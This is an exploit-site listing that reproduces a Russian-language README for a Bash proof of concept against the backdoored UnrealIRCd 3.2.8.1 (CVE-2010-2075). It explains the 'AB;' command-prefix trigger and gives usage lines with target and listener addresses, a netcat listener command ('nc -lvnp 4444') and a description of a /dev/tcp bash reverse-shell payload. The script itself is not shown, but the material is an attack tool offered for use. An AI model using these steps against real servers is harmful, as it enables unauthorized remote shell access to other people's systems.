Sploitus

Exploit for CVE-2010-2075

kitploit · 2026-09-03

Exploit Code

MARKDOWN35 lines
## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-TC-XONOR-CVE-2010-2075
# CVE-2010-2075 - Бэкдор в UnrealIRCd 3.2.8.1 (Bash PoC)

## Описание

Bash PoC для бэкдора, внедрённого в исходный tar-архив UnrealIRCd 3.2.8.1. Скомпрометированный бинарный файл выполняет произвольные команды с префиксом `AB;`, отправленные на IRC-порт.

## Использование

root@kitploit:~
    
    
    chmod +x exploit.sh
    ./exploit.sh <RHOST> <RPORT> <LHOST> <LPORT>
    

**Пример:**

root@kitploit:~
    
    
    ./exploit.sh 192.168.1.10 6667 192.168.1.20 4444
    

Перед запуском настройте слушатель:

root@kitploit:~
    
    
    nc -lvnp 4444
    

## Как это работает

Бэкдор проверяет входящие данные на наличие префикса `AB;` и передаёт остаток системной оболочке. Полезная нагрузка отправляет реверс-шелл bash через `/dev/tcp`.